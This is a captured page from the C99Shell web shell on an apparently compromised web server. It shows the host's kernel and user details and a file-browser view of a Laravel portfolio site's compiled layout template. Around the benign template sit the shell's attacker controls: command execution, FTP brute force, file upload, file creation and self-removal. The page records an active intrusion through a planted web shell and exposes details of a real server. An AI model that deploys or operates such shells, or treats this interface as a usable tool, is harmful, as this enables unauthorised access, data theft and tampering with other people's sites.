!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/portfolio2.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.23 GB of 117.98 GB (23.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     df766582e9af13ed32c7bbed5c5d25ea.php (9.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html>
<?php $siteDirection=isset(json_decode(get_settings('local_setting'))->direction)?json_decode(get_settings('local_setting'))->direction:'ltr';
?>
<html  class="no-js" lang="en" dir="<?php echo e($siteDirection); ?>">
<head>
    
    <?php echo $__env->yieldContent('css'); ?>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title><?php echo e(get_settings('app_name')); ?> </title>

    <?php if(get_settings('app_favicon')): ?>
    <link rel="icon" href="<?php echo e(asset('uploads/'.get_settings('app_favicon'))); ?>" type="image/x-icon">
    <?php endif; ?>


    <link rel="icon" href="<?php echo e(asset('assets/img/icon.png')); ?>" type="image/gif" sizes="16x16">
    <link rel="icon" href="<?php echo e(asset('assets/img/icon.png')); ?>" type="image/gif" sizes="18x18">
    <link rel="icon" href="<?php echo e(asset('assets/img/icon.png')); ?>" type="image/gif" sizes="20x20">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/bootstrap.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/fontawesome.all.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/owl.carousel.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/owl.theme.default.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/magnific-popup.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/meanmenu.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/normalize.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('front/css/style.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('assets/css/responsive.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('front/css/maicons.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('front/css/animate.css')); ?>">

<style>
    .ft-logo-section img{
        height:100%;
        width:100%;
    }
    .ft-logo-section{
        width: 200px;
        height: 75px;
    }
</style>
</head>

<body>
<?php
    $home_slider_sections 
json_decode(get_settings('home_slider_section'), true);
    
$home_contact_us_section json_decode(get_settings('home_contact_us'));
?>
    <!-- Start Header Area -->
    <header class="header">
        <div class="container">
            <div class="row">
                <div class="col-lg-3">
                    <div class="logo">
                        <h2>
                            <a href="<?php echo e(route('home')); ?>"><?php echo e(get_settings('app_name')); ?></a>
                        </h2>
                    </div>
                    <div class="mobile-menu"></div>
                </div>
                <div class="col-lg-9">
                    <div class="menu">
                        <nav>
                            <ul>
                                <li class="current"><a href="<?php echo e(route('home')); ?>">Home</a></li>
                                <li><a href="#about">About</a></li>
                                <li><a href="#services">Research</a></li>
                                <li><a href="#resume">Teaching</a></li>
                                <li><a href="#portfolio">Calculator</a></li>
                                <li><a href="#blog">Publications</a></li>
                                <li><a href="#contact">Contact</a></li>
                            </ul>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <!-- End Header Area -->

<?php echo $__env->yieldContent('main-section'); ?>

<div class="modal fade" id="terms_modal" style="display: none;" aria-hidden="true">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <h4 class="modal-title">Terms Of Service</h4>
                <button type="button" class="close btn-sm btn btn-default" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">×</span>
                </button>
            </div>
            <div class="modal-body">
                <?php echo get_settings('terms_condition'); ?>

            </div>
        </div>

    </div>
</div>


<div class="modal fade" id="privacy_modal" style="display: none;" aria-hidden="true">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <h4 class="modal-title">Privacy Policy</h4>
                <button type="button" class="close btn-sm btn btn-default" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">×</span>
                </button>
            </div>
            <div class="modal-body">
                <?php echo get_settings('privacy_policy'); ?>

            </div>
        </div>
    </div>
</div>
<footer class="footer">
    <div class="footer-top pt-70 pb-70">
        <div class="container">
            <div class="row">
                <div class="col-lg-4 col-md-6">
                    <div class="footer-widget-single">
                        <div class="ft-logo-section">
                            <img src="<?php echo e(asset('uploads/'.get_settings('app_logo'))); ?>" alt="">
                        </div>

                        <div class="nt-2">
                            <?php echo get_settings('footer_content'); ?>

                        </div>
                    </div>
                </div>

                <div class="col-lg-4 col-md-6">
                    <div class="footer-widget-single">
                        <h3>Useful Links</h3>
                        <ul>
                            <li><a href="#home">home</a></li>
                            <li><a href="#about">About us</a></li>
                            <li><a href="#services">Services</a></li>
                            <li><a class="terms_condition" href="">Terms of service</a></li>
                            <li><a class="privacy_policy" href="">Privacy policy</a></li>
                        </ul>
                    </div>
                </div>
                <div class="col-lg-4 col-md-6">
                    <div class="footer-widget-single">
                        <h3>Contact Us</h3>
                         <?php if(isset($home_contact_us_section->contact_us_address) && $home_contact_us_section->contact_us_address): ?>
                         <?php echo $home_contact_us_section->contact_us_address?>

                         <?php endif; ?>
                          <br>
                          <strong>Phone:</strong><?php echo e(isset($home_contact_us_section->contact_us_phone_number)?$home_contact_us_section->contact_us_phone_number:''); ?><br>
                          <strong>Email:</strong><?php echo e(isset($home_contact_us_section->contact_us_email)?$home_contact_us_section->contact_us_email:''); ?><br>

                        <ul class="social-link">
                            <li><a href="<?php echo e(isset($home_contact_us_section->facebook_link)?$home_contact_us_section->facebook_link:''); ?>" target="_blank"><i class="fab fa-facebook-f"></i></a></li>
                            <li><a href="<?php echo e(isset($home_contact_us_section->twitter_link)?$home_contact_us_section->twitter_link:''); ?>"  target="_blank"><i class="fab fa-twitter"></i></a></li>
                            <li><a href="<?php echo e(isset($home_contact_us_section->instagram_link)?$home_contact_us_section->instagram_link:''); ?>"  target="_blank"><i class="fab fa-instagram"></i></a></li>
                            <li><a href="<?php echo e(isset($home_contact_us_section->linkedin_link)?$home_contact_us_section->linkedin_link:''); ?>"  target="_blank"><i class="fab fa-linkedin"></i></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="footer-bottom pt-25 pb-25 text-center section-bg">
        <p> @ Copyright <a href="#"><?php echo e(get_settings('app_name')); ?></a> <?php echo e(date('Y')); ?>  | All Rights Reserved</p>
    </div>
</footer>
    <!-- Js File -->
    <script src="<?php echo e(asset('assets/js/modernizr.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery-3.6.0.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/popper.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/bootstrap.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/owl.carousel.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery.nav.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery.magnific-popup.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/mixitup.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery.waypoints.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery.counterup.min.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/jquery.meanmenu.js')); ?>"></script>
    <script src="<?php echo e(asset('assets/js/script.js')); ?>"></script>
    <script src="<?php echo e(asset('front/js/wow.min.js')); ?>"></script>
    <script src="<?php echo e(asset('front/js/theme.js')); ?>"></script>

<?php echo $__env->yieldContent('js'); ?>

<script>

    $(document).on('click', '.terms_condition', function(e){
        e.preventDefault();

        $('#terms_modal').modal('show');
    });

    $(document).on('click', '.privacy_policy', function(e){
        e.preventDefault();

        $('#privacy_modal').modal('show');
    });

</script>

</body>
</html>
<?php /**PATH E:\Project\CvTemplate\portfolio\resources\views/layouts/frontLayout.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--